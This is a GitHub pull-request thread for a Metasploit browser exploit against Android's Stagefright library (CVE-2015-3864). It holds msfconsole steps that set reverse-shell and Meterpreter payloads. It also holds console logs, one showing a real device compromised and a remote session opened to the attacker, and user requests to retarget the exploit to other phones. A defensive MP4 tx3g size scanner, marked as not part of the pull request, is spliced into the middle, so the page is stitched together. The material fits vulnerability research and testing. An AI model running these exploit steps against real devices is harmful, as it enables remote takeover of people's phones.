
Stagefright CVE-2015-3864 release #7357

Merged
acammack-r7 merged 1 commit into rapid7:master from jduck:stagefright-2015-3864-release on Sep 25, 2016

Conversation

jduck (Contributor) commented Sep 23, 2016

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/android/browser/stagefright_mp4_tx3g_64bit
  • Visit the exploit web server with a vulnerable device
  • Verify you receive a shell

An MSF rc file:

The Nexus targets require mettle:

set PAYLOAD linux/armle/mettle/reverse_tcp
set URIPATH /stagefright
exploit -j

The Samsung target works without mettle:

set PAYLOAD linux/armle/shell_reverse_tcp
set URIPATH /stagefright
exploit -j

jduck force-pushed the stagefright-2015-3864-release branch from d1f042e to dbf66f2 on September 23, 2016 16:14
timwr (Contributor) commented Sep 24, 2016

This is awesome, works great on a Nexus 6 with LMY47M

[*] Processing stagefright.rc for ERB directives.
resource (stagefright.rc)> use exploit/android/browser/stagefright_mp4_tx3g_64bit
resource (stagefright.rc)> set payload linux/armle/mettle/reverse_tcp
payload => linux/armle/mettle/reverse_tcp
resource (stagefright.rc)> set SRVHOST 192.168.43.203
SRVHOST => 192.168.43.203
resource (stagefright.rc)> set LHOST 192.168.43.203
LHOST => 192.168.43.203
resource (stagefright.rc)> set URIPATH /stagefright
URIPATH => /stagefright
resource (stagefright.rc)> exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.43.203:4444 
msf exploit(stagefright_mp4_tx3g_64bit) > [*] Using URL: http://192.168.43.203:8080/stagefright
[*] Server started.

msf exploit(stagefright_mp4_tx3g_64bit) > adb shell am start -a android.intent.action.VIEW -d http://192.168.43.203:8080/stagefright
[*] exec: adb shell am start -a android.intent.action.VIEW -d http://192.168.43.203:8080/stagefright

Starting: Intent { act=android.intent.action.VIEW dat=http://192.168.43.203:8080/stagefright }
msf exploit(stagefright_mp4_tx3g_64bit) > 
[*] Sending HTML to 192.168.43.133:38670...
[*] Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.43.133:38670... (heap: 0x0, code: 0x0 from Browser)
[*] Sending infoleak gzip'd MPEG4 (740 bytes) to 192.168.43.133:38670... (heap: 0xb4043080, code: 0x0 from Browser)
[*] Sending RCE gzip'd MPEG4 (102045 bytes) to 192.168.43.133:38670... (heap: 0xb4043080, code: 0xb6714e98 from Browser)
[*] Sending RCE gzip'd MPEG4 (102046 bytes) to 192.168.43.133:37802... (heap: 0xb4043080, code: 0xb6714e98 from SF)
[*] Sending stage (374540 bytes) to 192.168.43.133
[*] Meterpreter session 1 opened (192.168.43.203:4444 -> 192.168.43.133:40847) at 2016-09-24 08:38:12 +0100

msf exploit(stagefright_mp4_tx3g_64bit) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : localhost.localdomain
OS           :  (Linux 3.10.40-geec2459)
Architecture : armv7l
Meterpreter  : armle/linux
meterpreter > getuid 
Server username: uid=1013, gid=1013, euid=1005, egid=1005

@acammack-r7 acammack-r7 merged commit dbf66f2 into rapid7:master Sep 25, 2016
acammack-r7 added a commit that referenced this pull request Sep 25, 2016
busterb (Contributor) commented Sep 25, 2016

Woo hoo, thanks a lot @jduck & @acammack-r7.

SymbianSyMoh commented

Wow, that's great 👍

tdoan-r7 (Contributor) commented

@acammack-r7 can you add release notes to this ticket?

wchen-r7 (Contributor) commented

Release Notes

This module exploits an integer overflow vulnerability in the Stagefright library. The vulnerability can be abused in multiple ways, but this particular exploit is designed to work within an HTML5 compatible browser.
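A defender-side counterpart to the release note, added here and not part of the PR or of the Metasploit module: a small ISO BMFF (MP4) atom walker that flags `tx3g` sample entries whose declared size cannot be represented in 32 bits, exceeds the enclosing atom, or whose running total across several `tx3g` atoms would overflow a 32-bit size, which is the declared-size arithmetic the Stagefright overflow concerns. The atom layout follows the standard container format; the `atom`/`build_sample` helpers and both sample files are constructed for this illustration, and the check is a heuristic suited to a content-inspection or file-ingestion pipeline, not a parser of the sample-entry contents.

```python
import struct
from typing import List, Tuple

UINT32_MAX = 0xFFFFFFFF
# ISO BMFF atoms that hold child atoms. 'stsd' carries 8 bytes of
# version/flags + entry count before its first child sample entry.
CONTAINER_ATOMS = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"stsd"}


def scan_tx3g(data: bytes) -> List[Tuple[int, str]]:
    """Walk the atom tree and return (offset, reason) findings for tx3g atoms
    whose declared sizes look unsafe for a parser doing 32-bit size math."""
    findings: List[Tuple[int, str]] = []
    tx3g_total = 0  # running sum of declared tx3g sizes, as an accumulating parser would add them

    def walk(start: int, end: int) -> None:
        nonlocal tx3g_total
        pos = start
        while pos + 8 <= end:
            size, atype = struct.unpack(">I4s", data[pos:pos + 8])
            header = 8
            if size == 1:  # 64-bit 'largesize' follows the type field
                if pos + 16 > end:
                    findings.append((pos, "truncated largesize header"))
                    return
                size = struct.unpack(">Q", data[pos + 8:pos + 16])[0]
                header = 16
            elif size == 0:  # atom extends to the end of its container
                size = end - pos
            if atype == b"tx3g":
                if size > UINT32_MAX:
                    findings.append((pos, f"tx3g declared size {size:#x} exceeds 32 bits"))
                tx3g_total += size
                if tx3g_total > UINT32_MAX:
                    findings.append((pos, f"cumulative tx3g size {tx3g_total:#x} overflows 32 bits"))
            if size < header or pos + size > end:
                findings.append((pos, f"{atype!r} declared size {size:#x} exceeds enclosing atom"))
                return
            if atype in CONTAINER_ATOMS:
                walk(pos + header + (8 if atype == b"stsd" else 0), pos + size)
            pos += size

    walk(0, len(data))
    return findings


def atom(atom_type: bytes, payload: bytes) -> bytes:
    """Constructed helper: build a well-formed atom with a 32-bit size field."""
    return struct.pack(">I4s", 8 + len(payload), atom_type) + payload


def build_sample(tx3g_atoms: bytes) -> bytes:
    """Constructed helper: minimal ftyp + moov/trak/mdia/minf/stbl/stsd skeleton
    wrapping the given tx3g atom bytes (one declared stsd entry)."""
    stsd = atom(b"stsd", struct.pack(">II", 0, 1) + tx3g_atoms)  # version/flags, entry count
    moov = atom(b"moov", atom(b"trak", atom(b"mdia", atom(b"minf", atom(b"stbl", stsd)))))
    ftyp = atom(b"ftyp", b"isom" + struct.pack(">I", 0) + b"isom")
    return ftyp + moov


# Constructed sample 1: a normal, small tx3g sample entry.
BENIGN_SAMPLE = build_sample(atom(b"tx3g", b"\x00" * 32))
# Constructed sample 2: the tx3g header claims a 64-bit size above 2^32, but only
# 16 bytes of payload actually follow it.
OVERSIZED_SAMPLE = build_sample(
    struct.pack(">I4sQ", 1, b"tx3g", UINT32_MAX + 0x20) + b"\x00" * 16
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("oversized", OVERSIZED_SAMPLE)):
        print(name, scan_tx3g(sample))
```

Run on a file's bytes, an empty findings list means every `tx3g` size fit the container and 32-bit arithmetic; any finding is a reason to quarantine the file for manual review rather than hand it to a media parser.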

SymbianSyMoh commented Sep 27, 2016

I tried but no luck!

msf exploit(stagefright_mp4_tx3g_64bit) > set PAYLOAD linux/armle/shell_reverse_tcp
PAYLOAD => linux/armle/shell_reverse_tcp

msf exploit(stagefright_mp4_tx3g_64bit) > show options
Module options (exploit/android/browser/stagefright_mp4_tx3g_64bit):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  172.18.10.44     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /samsung         no        The URI to use for this exploit (default is random)


Payload options (linux/armle/shell_reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   ARGV0  sh               no        argv[0] to pass to execve
   LHOST  172.18.10.44     yes       The listen address
   LPORT  4449             yes       The listen port
   SHELL  /system/bin/sh   yes       The shell to execute.


Exploit target:
   Id  Name
   --  ----
   0   Automatic


msf exploit(stagefright_mp4_tx3g_64bit) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.18.10.44:4449 
[*] Using URL: http://172.18.10.44:8080/samsung
[*] Server started.
msf exploit(stagefright_mp4_tx3g_64bit) > 
[-] 172.18.10.44:39128 - Requested /samsung - Unknown user-agent: "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"

[-] 172.18.10.58:56455 - Requested /samsung - Unknown user-agent: "Mozilla/5.0 (Linux; Android 4.4.4; Samsung Galaxy Note 3 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36"

[-] 172.18.10.58:56578 - Requested /samsung - Unknown user-agent: "Mozilla/5.0 (Linux; Android 4.4.4; Samsung Galaxy Note 3 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36"

[-] 172.18.10.58:56818 - Requested /samsung - Unknown user-agent: "Mozilla/5.0 (Linux; Android 4.4.4; Samsung Galaxy Note 3 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36"

jduck (Contributor, Author) commented Sep 27, 2016

@SymbianSyMoh This isn't the correct forum for bug reports or feature requests. Feel free to create a new issue to describe your problem. In this case it should be something like "Feature: Please support exploiting the Samsung Galaxy Note 3 with KTU84P". Be sure to include the User-agent string in the issue body =)

@jduck jduck deleted the stagefright-2015-3864-release branch September 28, 2016 17:56
@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Oct 4, 2016
nitob commented Oct 18, 2016

Which emulator do you use?
I have the Android SDK; stagefright_mp4_tx3g_64bit - 10.15.0.6:57686 - Requested /6 - Unknown user-agent: "Mozilla/5.0

jduck (Contributor, Author) commented Oct 19, 2016

Emulators are not supported.

nitob commented Oct 19, 2016

It is not supported?
https://www.youtube.com/watch?v=dAZ4W6OkkRk

jduck (Contributor, Author) commented Oct 24, 2016

That's not an emulator. That is a live device being recorded with a screen recording program.

sathish09 commented

How do I modify it to work with the OnePlus One? How do I find the correct memory address of the OnePlus One to make it work?

wvu (Contributor) commented Nov 8, 2016

This is the wrong place for support questions.

wvu mentioned this pull request Dec 10, 2016
Labels: feature, module, rn-enhancement (release notes enhancement)